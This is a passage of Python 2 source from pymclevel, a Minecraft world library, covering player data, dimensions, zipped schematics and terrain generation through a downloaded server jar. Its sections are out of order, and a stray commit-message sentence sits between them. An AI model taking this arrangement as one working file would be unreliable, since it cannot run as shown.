        """Remove a chunk from memory and delete it from disk; a region file
        left completely empty is itself deleted."""
        if self._allChunks is not None: self._allChunks.discard((cx, cz))

        if (cx, cz) in self._loadedChunks:
            del self._loadedChunks[(cx, cz)]

        if self.version:
            r = cx >> 5, cz >> 5
            rf = self.getRegionFile(*r)
            if rf:
                rf.setOffset(cx & 0x1f , cz & 0x1f, 0)
                if (rf.offsets == 0).all():
                    rf.close()
                    os.unlink(rf.path)
                    del self.regionFiles[r]
        else:
            os.unlink(self.chunkFilename(cx, cz))

        self._bounds = None

    def deleteChunksInBox(self, box):
        """Delete every present chunk inside box; returns the list of
        positions actually deleted."""
        info(u"Deleting {0} chunks in {1}".format((box.maxcx - box.mincx) * (box.maxcz - box.mincz), ((box.mincx, box.mincz), (box.maxcx, box.maxcz))))
        i = 0;
        ret = [];
        for cx, cz in itertools.product(xrange(box.mincx, box.maxcx), xrange(box.mincz, box.maxcz)):
            i += 1;
            if self.containsChunk(cx, cz):
                self.deleteChunk(cx, cz);
                ret.append((cx, cz))
                assert not self.containsChunk(cx, cz), "Just deleted {0} but it didn't take".format((cx, cz))
            if i % 100 == 0:
                info(u"Chunk {0}...".format(i))

        return ret

    spawnxyz = ["SpawnX", "SpawnY", "SpawnZ"]

    def playerSpawnPosition(self, player=None):
        """
        xxx if player is None then it gets the default spawn position for the world
        if player hasn't used a bed then it gets the default spawn position
        """
        dataTag = self.root_tag["Data"]
        if player is None:
            playerSpawnTag = dataTag
        else:
            playerSpawnTag = self.getPlayerTag(player)

        return [playerSpawnTag.get(i, dataTag[i]).value for i in self.spawnxyz]

    def setPlayerSpawnPosition(self, pos, player=None):
        """ xxx if player is None then it sets the default spawn position for the world """
        if player is None:
            playerSpawnTag = self.root_tag["Data"]
        else:
            playerSpawnTag = self.getPlayerTag(player)
        for name, val in zip(self.spawnxyz, pos):
            playerSpawnTag[name] = nbt.TAG_Int(val);

    def getPlayerPath(self, player):
        # "Player" lives inside level.dat, never in players/
        assert player != "Player"
        return os.path.join(self.playersDir, player + ".dat")

    def getPlayerTag(self, player="Player"):
        """Return the NBT compound for the named player, loading and caching
        multiplayer player files on demand.  Raises PlayerNotFound."""
        if player == "Player":
            if player in self.root_tag["Data"]:
                #single-player world
                return self.root_tag["Data"]["Player"];
            raise PlayerNotFound, player
        else:
            playerFilePath = self.getPlayerPath(player)
            if os.path.exists(playerFilePath):
                #multiplayer world, found this player
                playerTag = self.playerTagCache.get(playerFilePath)
                if playerTag is None:
                    playerTag = nbt.load(playerFilePath)
                    self.playerTagCache[playerFilePath] = playerTag
                return playerTag
            else:
                raise PlayerNotFound, "{0}".format(player)
                #return None

    def getPlayerDimension(self, player="Player"):
        playerTag = self.getPlayerTag(player)
        if "Dimension" not in playerTag: return 0;
        return playerTag["Dimension"].value

    def setPlayerDimension(self, d, player="Player"):
        playerTag = self.getPlayerTag(player)
        if "Dimension" not in playerTag: playerTag["Dimension"] = nbt.TAG_Int(0);
        playerTag["Dimension"].value = d;

    def setPlayerPosition(self, pos, player="Player"):
        posList = nbt.TAG_List([nbt.TAG_Double(p) for p in pos]);
        playerTag = self.getPlayerTag(player)

        playerTag["Pos"] = posList

    def getPlayerPosition(self, player="Player"):
        playerTag = self.getPlayerTag(player)
        posList = playerTag["Pos"];

        pos = map(lambda x:x.value, posList);
        return pos;

    def setPlayerOrientation(self, yp, player="Player"):
        self.getPlayerTag(player)["Rotation"] = nbt.TAG_List([nbt.TAG_Float(p) for p in yp])

    def getPlayerOrientation(self, player="Player"):
        """ returns (yaw, pitch) """
        yp = map(lambda x:x.value, self.getPlayerTag(player)["Rotation"]);
        y, p = yp;
        # nudge pitch off the exact gimbal values 0 and 180
        if p == 0: p = 0.000000001;
        if p == 180.0: p -= 0.000000001;
        yp = y, p;
        return array(yp);

    def setPlayerAbilities(self, gametype, player="Player"):
        playerTag = self.getPlayerTag(player)
        # Check for the Abilities tag. It will be missing in worlds from before
        # Beta 1.9 Prerelease 5.
        if not 'abilities' in playerTag:
            playerTag['abilities'] = TAG_Compound()

        # Assumes creative (1) is the only mode with these abilities set,
        # which is true for now. Future game modes may not hold this to be
        # true, however.
        if gametype == 1:
            playerTag['abilities']['instabuild'] = TAG_Byte(1)
            playerTag['abilities']['mayfly'] = TAG_Byte(1)
            playerTag['abilities']['invulnerable'] = TAG_Byte(1)
        else:
            playerTag['abilities']['flying'] = TAG_Byte(0)
            playerTag['abilities']['instabuild'] = TAG_Byte(0)
            playerTag['abilities']['mayfly'] = TAG_Byte(0)
            playerTag['abilities']['invulnerable'] = TAG_Byte(0)

    def setPlayerGameType(self, gametype, player="Player"):
        playerTag = self.getPlayerTag(player)
        # This annoyingly works differently between single- and multi-player.
        if player == "Player":
            self.GameType = gametype
            self.setPlayerAbilities(gametype, player)
        else:
            playerTag['playerGameType'] = TAG_Int(gametype)
            self.setPlayerAbilities(gametype, player)

    def getPlayerGameType(self, player="Player"):
        if player == "Player":
            return self.GameType
        else:
            playerTag = self.getPlayerTag(player)
            return playerTag["playerGameType"].value
class MCAlphaDimension (MCInfdevOldLevel):
    """A dimension (Nether, The End, ...) stored in a DIM<n> subfolder of its
    parent world.  It shares level.dat, the player list, and the player tag
    cache with the parent; saving is delegated to the parent world."""

    def __init__(self, parentWorld, dimNo, create=False):
        filename = os.path.join(parentWorld.worldDir, "DIM" + str(int(dimNo)))

        # parentWorld must be set before the base __init__ runs, since
        # inherited code resolves shared state through it
        self.parentWorld = parentWorld;
        MCInfdevOldLevel.__init__(self, filename, create)
        self.dimNo = dimNo
        self.filename = parentWorld.filename
        self.playersDir = parentWorld.playersDir;
        self.players = parentWorld.players
        self.playerTagCache = parentWorld.playerTagCache

    @property
    def root_tag(self):
        # level.dat belongs to the parent world
        return self.parentWorld.root_tag;

    def __str__(self):
        return "MCAlphaDimension({0}, {1})".format(self.parentWorld, self.dimNo)

    def loadLevelDat(self, create=False, random_seed=None, last_played=None):
        pass;   # no own level.dat — see root_tag above

    def preloadDimensions(self):
        pass    # dimensions do not nest

    def create(self, *args, **kw):
        # only the DIM folder itself is created; no level.dat is written
        if not os.path.exists(self.worldDir):
            os.mkdir(self.worldDir)

    dimensionNames = { -1: "Nether", 1: "The End"};

    @property
    def displayName(self):
        return u"{0} ({1})".format(self.parentWorld.displayName,
                                   self.dimensionNames.get(self.dimNo, "Dimension %d" % self.dimNo))

    def saveInPlace(self, saveSelf=False):
        """saving the dimension will save the parent world, which will save any
        other dimensions that need saving.  the intent is that all of them can
        stay loaded at once for fast switching """
        if saveSelf:
            MCInfdevOldLevel.saveInPlace(self);
        else:
            self.parentWorld.saveInPlace();
from zipfile import ZipFile, is_zipfile
import tempfile
class ZipSchematic (MCInfdevOldLevel):
    """A world packed inside a zip file (used for schematic import/export).
    The zip is unpacked into a temporary world directory and read as a normal
    Alpha world; Width/Height/Length come from an embedded schematic.dat."""

    def __init__(self, filename):
        # NOTE(review): tempfile.mktemp is race-prone and deprecated;
        # mkdtemp would be safer — TODO confirm before changing.
        tempdir = tempfile.mktemp("schematic")
        zf = ZipFile(filename)
        self.zipfile = zf
        zf.extract("level.dat", tempdir)

        MCInfdevOldLevel.__init__(self, tempdir)
        self.filename = filename

        try:
            schematicDat = os.path.join(tempdir, "schematic.dat")
            with closing(self.zipfile.open("schematic.dat")) as f:
                schematicDat = nbt.load(buf=gunzip(f.read()))

                self.Width = schematicDat['Width'].value;
                self.Height = schematicDat['Height'].value;
                self.Length = schematicDat['Length'].value;
        except Exception, e:
            print "Exception reading schematic.dat, skipping: {0!r}".format(e)
            self.Width = 0
            self.Height = 128
            self.Length = 0

        # NOTE(review): if the try block failed before nbt.load, schematicDat
        # is still the path string here and this is a substring test — verify.
        if "Materials" in schematicDat:
            self.materials = namedMaterials[schematicDat["Materials"].value]

    def close(self):
        """Close the zip and remove the temporary world directory."""
        MCInfdevOldLevel.close(self)
        self.zipfile.close()
        shutil.rmtree(self.worldDir, True)

    def getWorldBounds(self):
        return BoundingBox((0, 0, 0), (self.Width, self.Height, self.Length))

    @classmethod
    def _isLevel(cls, filename):
        return is_zipfile(filename)

    def _loadChunk(self, chunk):
        # region-format zips are unpacked to disk (see preloadRegions) and
        # read via the base class; chunk-format zips are read directly
        if self.version:
            return MCInfdevOldLevel._loadChunk(self, chunk)
        else:
            cdata = self.zipfile.read(chunk.chunkFilename)
            chunk.compressedTag = cdata
            chunk.decompress()

    def _saveChunk(self, chunk):
        if self.version:
            return MCInfdevOldLevel._saveChunk(self, chunk)
        else:
            raise NotImplementedError, "Cannot save chunk-format zipfiles!"

    def saveInPlace(self):
        self.saveToFile(self.filename)

    def saveToFile(self, filename):
        """Re-zip the unpacked world directory and atomically-ish replace
        the target file."""
        tempfile = filename + ".new"
        from schematic import zipdir
        zipdir(self.worldDir, tempfile)

        if os.path.exists(filename):
            os.remove(filename)
        shutil.copy(tempfile, filename)

    def containsChunk(self, cx, cz):
        # NOTE(review): allChunks returns an iterator over _allChunks, so this
        # membership test consumes it; testing against self._allChunks (after
        # a scan) would be cheaper — confirm intent.
        return (cx, cz) in self.allChunks

    def preloadRegions(self):
        # unpack everything so the base-class region scanner can work on disk
        self.zipfile.extractall(self.worldDir)
        self.regionFiles = {}

        MCInfdevOldLevel.preloadRegions(self)

    def preloadChunkPaths(self):
        """Populate _allChunks straight from the zip's file listing without
        unpacking (chunk-format zips only)."""
        info(u"Scanning for chunks...")
        self._allChunks = set()

        infos = self.zipfile.infolist()
        names = [i.filename.split('/') for i in infos]
        goodnames = [n for n in names if len(n) == 3 and n[0] in self.dirhashes and n[1] in self.dirhashes]

        for name in goodnames:
            c = name[2].split('.')
            if len(c) == 4 and c[0].lower() == 'c' and c[3].lower() == 'dat':
                try:
                    cx, cz = (decbase36(c[1]), decbase36(c[2]))
                except Exception, e:
                    info('Skipped file {0} ({1})'.format('.'.join(c), e))
                    continue
                #self._loadedChunks[ (cx, cz) ] = InfdevChunk(self, (cx, cz));
                self._allChunks.add((cx, cz))

        info(u"Found {0} chunks.".format(len(self._allChunks)))

    def preloadDimensions(self):
        pass

    def loadLevelDat(self, create=False, random_seed=None, last_played=None):
        if create:
            raise NotImplementedError, "Cannot save zipfiles yet!"

        with closing(self.zipfile.open("level.dat")) as f:
            with closing(gzip.GzipFile(fileobj=StringIO(f.read()))) as g:
                self.root_tag = nbt.load(buf=g.read())

    def chunkFilename(self, x, z):
        # zip member paths always use forward slashes
        s = "/".join((self.dirhash(x), self.dirhash(z),
                      "c.%s.%s.dat" % (base36(x), base36(z))));
        return s;
Popen doesn't accept a unicode string for its cwd parameter (it doesn't use the wchar API?), so encode it. This fixes a generator failure when startingDir contains non-ASCII characters.
'''
Created on Jul 22, 2011
@author: Rio
'''
from mclevelbase import *
from collections import deque;
import time
import zlib
import struct
import shutil
import subprocess
import sys
import urllib
import tempfile
from os.path import join, dirname, basename
# Module logger plus short aliases used throughout this module.
log = logging.getLogger(__name__)
warn, error, info, debug = log.warn, log.error, log.info, log.debug
#infinite
# NBT tag-name constants for the "infdev"/Alpha chunk format; indexing tags
# with these names instead of bare literals avoids typos.
Level = 'Level'
BlockData = 'BlockData'
BlockLight = 'BlockLight'
SkyLight = 'SkyLight'
HeightMap = 'HeightMap'
TerrainPopulated = 'TerrainPopulated'
LastUpdate = 'LastUpdate'
xPos = 'xPos'
zPos = 'zPos'
Data = 'Data'
SpawnX = 'SpawnX'
SpawnY = 'SpawnY'
SpawnZ = 'SpawnZ'
LastPlayed = 'LastPlayed'
RandomSeed = 'RandomSeed'
SizeOnDisk = 'SizeOnDisk' #maybe update this?
Time = 'Time'
Player = 'Player'
# Names exported by "from infiniteworld import *".
__all__ = ["ZeroChunk", "InfdevChunk", "ChunkedLevelMixin", "MCInfdevOldLevel", "MCAlphaDimension", "ZipSchematic"]
import re
def convert(text):
    """Return *text* as an int when it is all digits, otherwise unchanged."""
    return int(text) if text.isdigit() else text

def alphanum_key(key):
    """Split *key* into alternating string/int pieces for natural sorting,
    so "item2" orders before "item10"."""
    return [convert(c) for c in re.split('([0-9]+)', key)]

def sort_nicely(l):
    """ Sort the given list in the way that humans expect.
    """
    l.sort(key=alphanum_key)
# Thank you, Stackoverflow
# http://stackoverflow.com/questions/377017/test-if-executable-exists-in-python
def which(program):
    """Find an executable named *program*.

    A name with a directory component is tested directly; a bare name is
    looked up under %SYSTEMROOT% (Windows only) and then along $PATH.
    Returns the full path, or None when nothing runnable is found.
    """
    def runnable(path):
        # Executable == exists and the current user holds execute permission.
        return os.path.exists(path) and os.access(path, os.X_OK)

    directory, _ = os.path.split(program)
    if directory:
        if runnable(program):
            return program
    else:
        if sys.platform == "win32" and "SYSTEMROOT" in os.environ:
            candidate = os.path.join(os.environ["SYSTEMROOT"], program)
            if runnable(candidate):
                return candidate
        if "PATH" in os.environ:
            for entry in os.environ["PATH"].split(os.pathsep):
                candidate = os.path.join(entry, program)
                if runnable(candidate):
                    return candidate
    return None
# Per-platform application-support directory for pymclevel's caches.
# NOTE(review): appDataDir comes from mclevelbase (star import) — confirm.
if sys.platform == "win32":
    appSupportDir = os.path.join(appDataDir, u"pymclevel")
elif sys.platform == "darwin":
    appSupportDir = os.path.expanduser(u"~/Library/Application Support/pymclevel/")
else:
    appSupportDir = os.path.expanduser(u"~/.pymclevel")
class ServerJarStorage(object):
    """On-disk cache of minecraft_server.jar files, one subfolder per server
    version, used by MCServerChunkGenerator for terrain generation."""
    defaultCacheDir = os.path.join(appSupportDir, u"ServerJarStorage")
    def __init__(self, cacheDir=None):
        """Create the cache folder (and its README) if needed, then scan it."""
        if cacheDir is None:
            cacheDir = self.defaultCacheDir
        self.cacheDir = cacheDir
        if not os.path.exists(self.cacheDir):
            os.makedirs(self.cacheDir)
        readme = os.path.join(self.cacheDir, "README.TXT")
        if not os.path.exists(readme):
            with file(readme, "w") as f:
                f.write("""
About this folder:
This folder is used by MCEdit and pymclevel to store different versions of the
Minecraft Server to use for terrain generation. It should have one or more
subfolders, one for each version of the server. Each subfolder must hold at
least one file named minecraft_server.jar, and the subfolder's name should
have the server's version plus the names of any installed mods.
There may already be a subfolder here (for example, "Beta 1.7.3") if you have
used the Chunk Create feature in MCEdit to create chunks using the server.
Version numbers can be automatically detected. If you place one or more
minecraft_server.jar files in this folder, they will be placed automatically
into well-named subfolders the next time you run MCEdit. If a file's name
begins with "minecraft_server" and ends with ".jar", it will be detected in
this way.
""")
        self.reloadVersions()
    def reloadVersions(self):
        """Rebuild self.versions from the cache folder, newest first, and file
        any loose minecraft_server*.jar into a version-named subfolder."""
        cacheDirList = os.listdir(self.cacheDir)
        self.versions = list(reversed(sorted([v for v in cacheDirList if os.path.exists(self.jarfileForVersion(v))], key=alphanum_key)))
        # Classifying a loose jar requires running it, hence the java check.
        if MCServerChunkGenerator.javaExe:
            for f in cacheDirList:
                p = os.path.join(self.cacheDir, f)
                if f.startswith("minecraft_server") and f.endswith(".jar") and os.path.isfile(p):
                    print "Unclassified minecraft_server.jar found in cache dir. Discovering version number..."
                    self.cacheNewVersion(p)
                    os.remove(p)
        print "Minecraft_Server.jar storage initialized."
        print u"Each server is stored in a subdirectory of {0} named with the server's version number".format(self.cacheDir)
        print "Cached servers: ", self.versions
    def downloadCurrentServer(self):
        """Fetch the latest server jar from minecraft.net into the cache.
        Download errors are reported and swallowed (best effort)."""
        print "Downloading the latest Minecraft Server..."
        try:
            (filename, headers) = urllib.urlretrieve("http://www.minecraft.net/download/minecraft_server.jar")
        except Exception, e:
            print "Error downloading server: {0!r}".format(e)
            return
        self.cacheNewVersion(filename, allowDuplicate=False)
    def cacheNewVersion(self, filename, allowDuplicate=True):
        """ Finds the version number from the server jar at filename and copies
        it into the proper subfolder of the server jar cache folder"""
        version = MCServerChunkGenerator._serverVersionFromJarFile(filename)
        print "Found version ", version
        versionDir = os.path.join(self.cacheDir, version)
        i = 1
        newVersionDir = versionDir
        # Pick a unique "<version> (n)" folder name when the version exists.
        while os.path.exists(newVersionDir):
            if not allowDuplicate: return
            newVersionDir = versionDir + " (" + str(i) + ")"
            i += 1
        os.mkdir(newVersionDir)
        shutil.copy2(filename, os.path.join(newVersionDir, "minecraft_server.jar"))
        if version not in self.versions:
            self.versions.append(version)
    def jarfileForVersion(self, v):
        # Encoded to bytes so the path can be handed to subprocess (py2).
        return os.path.join(self.cacheDir, v, "minecraft_server.jar").encode(sys.getfilesystemencoding())
    def checksumForVersion(self, v):
        """Return the hex MD5 of the cached jar for version *v* (used to key
        temp-world folders)."""
        jf = self.jarfileForVersion(v)
        with file(jf, "rb") as f:
            import hashlib
            return (hashlib.md5(f.read()).hexdigest())
    # Server builds excluded from latestVersion (apparently known-bad).
    broken_versions = ["Beta 1.9 Prerelease {0}".format(i) for i in (1,2,3)]
    @property
    def latestVersion(self):
        """Newest cached, non-broken version by natural order, or None."""
        if len(self.versions) == 0: return None
        return max( (v for v in self.versions if v not in self.broken_versions), key=alphanum_key)
    def getJarfile(self, version=None):
        """Return the jar path for *version* (default: latest), downloading a
        server first when the cache is empty; None when unavailable."""
        if len(self.versions) == 0:
            print "No servers found in cache."
            self.downloadCurrentServer()
        version = version or self.latestVersion
        if version not in self.versions: return None
        return self.jarfileForVersion(version)
class JavaNotFound(RuntimeError):
    """Raised when no usable Java executable can be located."""
class VersionNotFound(RuntimeError):
    """Raised when the requested server version is not in the jar cache."""
def readProperties(filename):
    """Parse a server.properties-style file into a dict.

    Lines are "key=value"; lines starting with '#' and blank lines are
    skipped.  Returns an empty dict when the file does not exist.
    """
    if not os.path.exists(filename): return {}
    properties = {}
    with open(filename) as f:
        for raw in f:
            line = raw.strip()
            # Fix: the old dict((line.split("=", 2) ...)) crashed with
            # ValueError on blank lines and on values containing '=' —
            # partition always yields exactly one key and one value.
            if not line or line.startswith("#"):
                continue
            key, _, value = line.partition("=")
            properties[key] = value
    return properties
def saveProperties(filename, properties):
    """Write *properties* to *filename*, one "key=value" line per entry."""
    lines = ["{0}={1}\n".format(key, value) for key, value in properties.items()]
    with open(filename, "w") as out:
        out.writelines(lines)
def findJava():
    """Locate the Java executable.

    On Windows: try java.exe on the search path, then fall back to reading
    JavaHome for the current JRE out of the registry via "REG QUERY".
    Elsewhere: just look up "java" on $PATH.  Returns a path or None."""
    if sys.platform == "win32":
        javaExe = which("java.exe")
        if javaExe is None:
            KEY_NAME = "HKLM\SOFTWARE\JavaSoft\Java Runtime Environment"
            try:
                # First query discovers the CurrentVersion value...
                p = subprocess.Popen(["REG", "QUERY", KEY_NAME, "/v", "CurrentVersion"], stdout=subprocess.PIPE, universal_newlines=True)
                o, e = p.communicate()
                lines = o.split("\n")
                for l in lines:
                    l = l.strip()
                    if l.startswith("CurrentVersion"):
                        words = l.split(None, 2)
                        version = words[-1]
                        # ...second query reads that version's JavaHome.
                        p = subprocess.Popen(["REG", "QUERY", KEY_NAME + "\\" + version, "/v", "JavaHome"], stdout=subprocess.PIPE, universal_newlines=True)
                        o, e = p.communicate()
                        lines = o.split("\n")
                        for l in lines:
                            l = l.strip()
                            if l.startswith("JavaHome"):
                                w = l.split(None, 2)
                                javaHome = w[-1]
                                javaExe = os.path.join(javaHome, "bin", "java.exe")
                                print "RegQuery: java.exe found at ", javaExe
                                break
            except Exception, e:
                # Best effort: registry lookup failure leaves javaExe as None.
                print "Error while locating java.exe using the Registry: ", repr(e)
    else:
        javaExe = which("java")
    return javaExe
class MCServerChunkGenerator(object):
    """Generates chunks using minecraft_server.jar. Uses a ServerJarStorage to
    store different versions of minecraft_server.jar in an application support
    folder.
    from pymclevel import *
    Example usage:
    gen = MCServerChunkGenerator() # with no arguments, use the newest
    # server version in the cache, or download
    # the newest one automatically
    level = loadWorldNamed("MyWorld")
    gen.generateChunkInLevel(level, 12, 24)
    Using an older version:
    gen = MCServerChunkGenerator("Beta 1.6.5")
    """
    defaultJarStorage = None
    # Located once at import time; None means java was not found.
    javaExe = findJava()
    jarStorage = None
    # Maps (serverVersion, RandomSeed) -> cached scratch world.
    tempWorldCache = {}
    def __init__(self, version=None, jarfile=None, jarStorage=None):
        """Pick a server jar (explicit file, named version, or newest cached).

        Raises JavaNotFound or VersionNotFound when prerequisites are missing."""
        self.jarStorage = jarStorage or self.getDefaultJarStorage()
        if self.javaExe is None:
            raise JavaNotFound, "Could not find java. Please check that java is installed correctly. (Could not find java in your PATH environment variable.)"
        if jarfile is None:
            jarfile = self.jarStorage.getJarfile(version)
        if jarfile is None:
            raise VersionNotFound, "Could not find minecraft_server.jar for version {0}. Please make sure that a minecraft_server.jar is placed under {1} in a subfolder named after the server's version number.".format(version or "(latest)", self.jarStorage.cacheDir)
        self.serverJarFile = jarfile
        self.serverVersion = version or self._serverVersion()
    @classmethod
    def getDefaultJarStorage(cls):
        """Create (once) and return the shared ServerJarStorage instance."""
        if cls.defaultJarStorage is None:
            cls.defaultJarStorage = ServerJarStorage()
        return cls.defaultJarStorage
    @classmethod
    def clearWorldCache(cls):
        """Drop the in-memory world cache and delete cached worlds on disk."""
        cls.tempWorldCache = {}
        for tempDir in os.listdir(cls.worldCacheDir):
            t = os.path.join(cls.worldCacheDir, tempDir)
            if os.path.isdir(t):
                shutil.rmtree(t)
    def createReadme(self):
        """Write an explanatory README into the world cache folder, once."""
        readme = os.path.join(self.worldCacheDir, "README.TXT")
        if not os.path.exists(readme):
            with file(readme, "w") as f:
                f.write("""
About this folder:
This folder is used by MCEdit and pymclevel to cache levels during terrain
generation. Feel free to delete it for any reason.
""")
    worldCacheDir = os.path.join(tempfile.gettempdir(), "pymclevel_MCServerChunkGenerator")
    def tempWorldForLevel(self, level):
        """Return (tempWorld, tempDir): a scratch world matching *level*'s seed
        for the server to generate into, cached per (version, seed)."""
        #tempDir = tempfile.mkdtemp("mclevel_servergen")
        tempDir = os.path.join(self.worldCacheDir, self.jarStorage.checksumForVersion(self.serverVersion), str(level.RandomSeed))
        propsFile = os.path.join(tempDir, "server.properties")
        properties = readProperties(propsFile)
        tempWorld = self.tempWorldCache.get((self.serverVersion, level.RandomSeed))
        if tempWorld is None:
            if not os.path.exists(tempDir):
                os.makedirs(tempDir)
            self.createReadme()
            worldName = "world"
            worldName = properties.setdefault("level-name", worldName)
            tempWorldDir = os.path.join(tempDir, worldName)
            tempWorld = MCInfdevOldLevel(tempWorldDir, create=True, random_seed=level.RandomSeed)
            del tempWorld.version # for compatibility with older servers. newer ones will set it again without issue.
            self.tempWorldCache[self.serverVersion, level.RandomSeed] = tempWorld
        if level.dimNo == 0:
            properties["allow-nether"] = "false"
        else:
            tempWorld = tempWorld.getDimension(level.dimNo)
            properties["allow-nether"] = "true"
        # Random high port so parallel generator runs don't collide.
        properties["server-port"] = int(32767 + random.random() * 32700)
        saveProperties(propsFile, properties)
        return (tempWorld, tempDir)
    def generateAtPosition(self, tempWorld, tempDir, cx, cz):
        """Run generateAtPositionIter to completion, discarding progress."""
        return exhaust(self.generateAtPositionIter(tempWorld, tempDir, cx, cz))
    def generateAtPositionIter(self, tempWorld, tempDir, cx, cz, simulate = False):
        """Generator: spawn the server with its spawn point at chunk (cx, cz),
        yield its log lines as progress, and stop it once startup completes.

        Retries once with smaller -Xmx flags when the JVM can't reserve heap."""
        tempWorld.setPlayerSpawnPosition((cx * 16, 64, cz * 16))
        tempWorld.saveInPlace()
        tempWorld.unloadRegions()
        startTime = time.time()
        proc = self.runServer(tempDir)
        while proc.poll() is None:
            line = proc.stderr.readline().strip()
            info(line)
            yield line
            if "[INFO] Done" in line:
                if simulate:
                    # Let the server run for about as long as startup took so
                    # it can process tile ticks before we stop it.
                    duration = time.time() - startTime
                    simSeconds = int(duration) + 1
                    for i in range(simSeconds):
                        # process tile ticks
                        yield "%2d/%2d: Simulating the world for a little bit..." % (i, simSeconds)
                        time.sleep(1)
                proc.stdin.write("stop\n")
                proc.wait()
                break
            if "FAILED TO BIND" in line:
                proc.kill()
                proc.wait()
                raise RuntimeError, "Server failed to bind to port!"
        stdout, _ = proc.communicate()
        if "Could not reserve enough space" in stdout and not MCServerChunkGenerator.lowMemory:
            MCServerChunkGenerator.lowMemory = True
            for i in self.generateAtPositionIter(tempWorld, tempDir, cx, cz):
                yield i
        (tempWorld.parentWorld or tempWorld).loadLevelDat() #reload version number
    def copyChunkAtPosition(self, tempWorld, level, cx, cz):
        """Copy chunk (cx, cz) from tempWorld into level; no-op when level
        already has it."""
        if level.containsChunk(cx, cz): return
        try:
            tempChunk = tempWorld.getChunk(cx, cz)
        except ChunkNotPresent, e:
            raise ChunkNotPresent, "While generating a world in {0} using server {1} ({2!r})".format(tempWorld, self.serverJarFile, e), sys.exc_traceback
        tempChunk.decompress()
        tempChunk.unpackChunkData()
        root_tag = tempChunk.root_tag
        if not level.containsChunk(cx, cz):
            level.createChunk(cx, cz)
        chunk = level.getChunk(cx, cz)
        chunk.decompress()
        chunk.unpackChunkData()
        chunk.root_tag = root_tag #xxx tag swap, could copy blocks and entities and chunk attrs instead?
        chunk.dirty = True
        chunk.compress()
        chunk.save()
        chunk.unload()
        tempChunk.compress()
        tempChunk.unload()
    def generateChunkInLevel(self, level, cx, cz):
        """Generate one chunk with the server and copy it into *level*."""
        assert isinstance(level, MCInfdevOldLevel)
        tempWorld, tempDir = self.tempWorldForLevel(level)
        self.generateAtPosition(tempWorld, tempDir, cx, cz)
        self.copyChunkAtPosition(tempWorld, level, cx, cz)
    # Chunk radii assumed generated around the spawn per server run
    # (see the 11x11 note in generateChunksInLevelIter) — TODO confirm.
    minRadius = 5
    maxRadius = 20
    def createLevel(self, level, box, simulate = False, **kw):
        """Run createLevelIter to completion, discarding progress."""
        return exhaust(self.createLevelIter(level, box, simulate, **kw))
    def createLevelIter(self, level, box, simulate = False, **kw):
        """Generator: create (or open) *level* and have the server generate
        every chunk inside *box*, yielding (i, total, progressLine) tuples."""
        if isinstance(level, basestring):
            filename = level
            level = MCInfdevOldLevel(filename, create=True, **kw)
        assert isinstance(level, MCInfdevOldLevel)
        minRadius = self.minRadius
        # Step by the generated radius so successive runs tile the box.
        genPositions = list(itertools.product(
                       xrange(box.mincx, box.maxcx, minRadius * 2),
                       xrange(box.mincz, box.maxcz, minRadius * 2)))
        for i, (cx,cz) in enumerate(genPositions):
            info("Generating at %s" % ((cx,cz),))
            parentDir = dirname(level.worldDir)
            propsFile = join(parentDir, "server.properties")
            props = readProperties(join(dirname(self.serverJarFile), "server.properties"))
            props["level-name"] = basename(level.worldDir)
            props["server-port"] = int(32767 + random.random() * 32700)
            saveProperties(propsFile, props)
            for p in self.generateAtPositionIter(level, parentDir, cx, cz, simulate):
                yield i, len(genPositions), p
        level.unloadRegions()
    def generateChunksInLevel(self, level, chunks):
        """Run generateChunksInLevelIter to completion, discarding progress."""
        return exhaust(self.generateChunksInLevelIter(level, chunks))
    def generateChunksInLevelIter(self, level, chunks, simulate = False):
        """Generator: produce every chunk position in *chunks*, batching server
        runs around picked centers and copying whatever was generated.

        Yields (done, total) or (done, total, progressLine) as it goes."""
        assert isinstance(level, MCInfdevOldLevel)
        tempWorld, tempDir = self.tempWorldForLevel(level)
        startLength = len(chunks)
        minRadius = self.minRadius
        maxRadius = self.maxRadius
        chunks = set(chunks)
        while len(chunks):
            length = len(chunks)
            centercx, centercz = chunks.pop()
            chunks.add((centercx, centercz))
            #assume the generator always generates at least an 11x11 chunk square.
            centercx += minRadius
            centercz += minRadius
            #boxedChunks = [cPos for cPos in chunks if inBox(cPos)]
            print "Generating {0} chunks out of {1} starting from {2}".format("XXX", len(chunks), (centercx, centercz))
            yield startLength - len(chunks), startLength
            #chunks = [c for c in chunks if not inBox(c)]
            for p in self.generateAtPositionIter(tempWorld, tempDir, centercx, centercz, simulate):
                yield startLength - len(chunks), startLength, p
            i=0
            # Harvest every populated chunk the server produced near the center.
            for cx, cz in itertools.product(
                            xrange(centercx-maxRadius, centercx+maxRadius),
                            xrange(centercz-maxRadius, centercz+maxRadius)):
                if level.containsChunk(cx,cz):
                    chunks.discard((cx,cz))
                elif ((cx,cz) in chunks
                    and tempWorld.containsChunk(cx, cz)
                    and tempWorld.getChunk(cx,cz).TerrainPopulated
                    ):
                    self.copyChunkAtPosition(tempWorld, level, cx, cz)
                    i+= 1
                    chunks.discard((cx,cz))
                    yield startLength - len(chunks), startLength
            if length == len(chunks):
                # No progress this round — avoid looping forever.
                print "No chunks were generated. Aborting."
                break
        level.saveInPlace()
    def runServer(self, startingDir):
        # Popen's cwd must be a byte string on py2/Windows; encode unicode dirs.
        if isinstance(startingDir, unicode): startingDir = startingDir.encode(sys.getfilesystemencoding())
        return self._runServer(startingDir, self.serverJarFile)
    # Set once a JVM heap-reservation failure is seen; drops the -Xmx flags.
    lowMemory = False
    @classmethod
    def _runServer(cls, startingDir, jarfile):
        """Launch the server jar headless in *startingDir*, pipes attached."""
        info("Starting server %s in %s", jarfile, startingDir)
        if cls.lowMemory: memflags = []
        else: memflags = ["-Xmx1024M", "-Xms1024M", ]
        proc = subprocess.Popen([cls.javaExe, "-Djava.awt.headless=true"] + memflags + ["-jar", jarfile],
            executable=cls.javaExe,
            cwd=startingDir,
            stdin=subprocess.PIPE,
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE,
            universal_newlines=True,
            )
        return proc
    def _serverVersion(self):
        return self._serverVersionFromJarFile(self.serverJarFile)
    @classmethod
    def _serverVersionFromJarFile(cls, jarfile):
        """Briefly run *jarfile* in a temp dir and parse the version banner
        from its log; returns "Unknown" if no banner appears."""
        tempdir = tempfile.mkdtemp("mclevel_servergen")
        proc = cls._runServer(tempdir, jarfile)
        version = "Unknown"
        #out, err = proc.communicate()
        #for line in err.split("\n"):
        while proc.poll() is None:
            line = proc.stderr.readline()
            if "Preparing start region" in line: break
            if "Starting minecraft server version" in line:
                version = line.split("Starting minecraft server version")[1].strip()
